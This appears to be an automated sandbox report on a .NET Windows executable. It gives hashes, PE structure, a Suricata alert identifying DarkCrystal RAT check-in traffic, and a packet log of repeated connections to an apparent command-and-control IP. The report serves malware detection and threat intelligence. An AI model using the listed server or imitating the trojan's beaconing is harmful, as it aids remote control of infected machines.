                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):5.755390767717009
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                  • Win32 Executable (generic) a (10002005/4) 49.75%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Windows Screen Saver (13104/52) 0.07%
                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                  File name:ArELGBzuuF.exe
                  File size:539'136 bytes
                  MD5:c410e5bdd0e37ab9d6b8efc9b1b26b71
                  SHA1:462c843a64da7007418da4f7d0609e08afb755de
                  SHA256:d0894a5628fab64b123fddcac95568a81b0f57298ae088a3ea548122b66d5f78
                  SHA512:439fbfc6752e0e18cb1cb015b661d51f23835d537f57942d3c19cebf0c490a74b3407208efa0e1109b264369bff2fcc896c8fe0023cc6023be2da130f1d3f02c
                  SSDEEP:6144:k+Gyb1F8PdF6ZbmDShI5waSqLhzbtRqeObojE9gTbj74vaPXlsz66rZ:klq1G1FOuwxaRqAIgLBX+66rZ
                  TLSH:75B4D51566D70676E0BAABB18492284D83B5F8E7F72ACFCE7440C0DA97993C88D51733
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......2...........Q... ...`....@.. ....................................@................................

                  File Icon

                  Icon Hash:00928e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x4851ae
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x851580x53.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x370.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x831b40x83200f63295d07e14a94829a9497b3bdaf84aFalse0.39607848248331745data5.764616927091724IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x860000x3700x4004cc840a2f4eb0f74d1e09833935de902False0.376953125data2.867353130536527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x880000xc0x200f13c8c8d664ca5f7cb63eec89840b365False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_VERSION0x860580x318data0.44823232323232326

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-12-27T04:02:39.212632+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549750185.43.5.14580TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 27, 2024 04:02:37.653934002 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:37.773569107 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:37.773761988 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:37.774264097 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:37.893855095 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:38.131818056 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:38.251596928 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.151474953 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.212631941 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.256165028 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.256191015 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.256292105 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.285521030 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.405075073 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.492820978 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.612315893 CET8049756185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.612416029 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.621743917 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.637546062 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.731559038 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.741288900 CET8049756185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.757081985 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:39.771636009 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:39.979406118 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:40.087733984 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:40.098979950 CET8049756185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:40.133019924 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:40.162365913 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:40.281975985 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:40.521759033 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:40.608403921 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:40.641360044 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:40.641474962 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:40.662254095 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.024756908 CET8049756185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.068489075 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.141308069 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.193531990 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.275346994 CET8049756185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.318500996 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.395050049 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.396619081 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.396832943 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.515115976 CET8049757185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.515202045 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.515373945 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.517151117 CET8049750185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.517216921 CET4975080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.517543077 CET8049756185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.517601967 CET4975680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.635454893 CET8049757185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:41.865438938 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:41.984994888 CET8049757185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:42.937947989 CET8049757185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:42.990502119 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.195390940 CET8049757185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:43.197041035 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.314780951 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.317832947 CET8049757185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:43.317922115 CET4975780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.435089111 CET8049762185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:43.435173988 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.435369015 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.554855108 CET8049762185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:43.787308931 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:43.906830072 CET8049762185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:44.759114027 CET8049762185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:44.802884102 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.038430929 CET8049762185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:45.084261894 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.160763979 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.161042929 CET4976780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.280495882 CET8049767185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:45.280572891 CET4976780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.280616999 CET8049762185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:45.280670881 CET4976280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.280735016 CET4976780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.400125980 CET8049767185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:45.631140947 CET4976780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:45.750694036 CET8049767185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.147396088 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.162879944 CET4976780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.266922951 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.267018080 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.267146111 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.283869982 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.329129934 CET8049767185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.386559010 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.403490067 CET8049772185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.403559923 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.403728962 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.414535999 CET8049767185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.414597988 CET4976780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.523185968 CET8049772185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.615582943 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.735182047 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.735219955 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:46.756097078 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:46.875737906 CET8049772185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:47.697309971 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:47.740411997 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:47.792618036 CET8049772185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:47.834120035 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:47.942076921 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:47.990405083 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.029561996 CET8049772185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:48.084108114 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.143851995 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.143874884 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.144182920 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.263603926 CET8049775185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:48.263634920 CET8049770185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:48.263701916 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.263741016 CET4977080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.263906956 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.264070988 CET8049772185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:48.264127970 CET4977280192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.383322001 CET8049775185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:48.615452051 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:48.734966993 CET8049775185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:49.633894920 CET8049775185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:49.677879095 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:49.878262997 CET8049775185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:49.927870035 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:50.003269911 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:50.122874022 CET8049781185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:50.122980118 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:50.123171091 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:50.242888927 CET8049781185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:50.474844933 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:50.594393015 CET8049781185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:51.487154961 CET8049781185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:51.537377119 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.730349064 CET8049781185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:51.771601915 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.842093945 CET4977580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.845546007 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.845815897 CET4978680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.965735912 CET8049786185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:51.965847015 CET8049781185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:51.965863943 CET4978680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.965910912 CET4978180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:51.966067076 CET4978680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:52.085656881 CET8049786185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:52.318808079 CET4978680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:52.439173937 CET8049786185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:52.944201946 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:52.944322109 CET4978680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.063744068 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.063935995 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.064042091 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.064124107 CET8049786185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.064210892 CET4978680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.064812899 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.183485031 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.184345007 CET8049789185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.184442997 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.184561014 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.303994894 CET8049789185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.412385941 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.531881094 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.531971931 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:53.537337065 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:53.656899929 CET8049789185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:54.391868114 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:54.443474054 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:54.594810963 CET8049789185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:54.624980927 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:54.646737099 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:54.677962065 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:54.847470999 CET8049789185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:54.896636009 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:54.970482111 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:54.970741034 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:54.970750093 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:55.090213060 CET8049795185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:55.090296030 CET8049788185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:55.090322971 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:55.090361118 CET4978880192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:55.090657949 CET8049789185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:55.090715885 CET4978980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:55.096374035 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:55.215838909 CET8049795185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:55.443537951 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:55.563066959 CET8049795185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:56.539105892 CET8049795185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:56.584213972 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:56.782268047 CET8049795185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:56.834137917 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:56.910378933 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:56.910522938 CET4979580192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:57.030059099 CET8049801185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:57.030144930 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:57.030258894 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:57.149734974 CET8049801185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:57.381047010 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:57.500598907 CET8049801185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:58.395751953 CET8049801185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:58.443490982 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.638334036 CET8049801185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:58.693531990 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.751614094 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.751856089 CET4980780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.871428013 CET8049807185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:58.871443987 CET8049801185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:58.871552944 CET4980180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.873152971 CET4980780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.873152971 CET4980780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:58.992645979 CET8049807185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:59.225784063 CET4980780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:59.345289946 CET8049807185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:59.646140099 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:59.649225950 CET4980780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:59.765610933 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:59.765738010 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:59.765866041 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:02:59.809052944 CET8049807185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:59.885303020 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:59.925940990 CET8049807185.43.5.145192.168.2.5
                  Dec 27, 2024 04:02:59.926053047 CET4980780192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:00.004185915 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:00.119935036 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:00.123821974 CET8049810185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:00.123888969 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:00.126884937 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:00.239464045 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:00.239484072 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:00.246282101 CET8049810185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:00.474874973 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:00.594350100 CET8049810185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:01.181062937 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:01.224733114 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:01.431421041 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:01.474728107 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:01.500868082 CET8049810185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:01.552874088 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:01.781069994 CET8049810185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:01.834347010 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:01.915040016 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:01.915111065 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:01.915401936 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:02.034976959 CET8049816185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:02.035090923 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:02.035289049 CET8049809185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:02.035291910 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:02.035324097 CET8049810185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:02.035361052 CET4980980192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:02.035398960 CET4981080192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:02.154723883 CET8049816185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:02.381148100 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:02.500686884 CET8049816185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:03.365736008 CET8049816185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:03.412219048 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:03.600866079 CET8049816185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:03.646625996 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:03.731825113 CET4982180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:03.731935978 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:03.851416111 CET8049821185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:03.851507902 CET4982180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:03.851660013 CET4982180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:03.851686954 CET8049816185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:03.851757050 CET4981680192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:04.101217985 CET8049821185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:04.209291935 CET4982180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:04.328850985 CET8049821185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:05.358464956 CET8049821185.43.5.145192.168.2.5
                  Dec 27, 2024 04:03:05.412247896 CET4982180192.168.2.5185.43.5.145
                  Dec 27, 2024 04:03:05.606223106 CET8049821185.43.5.145192.168.2.5
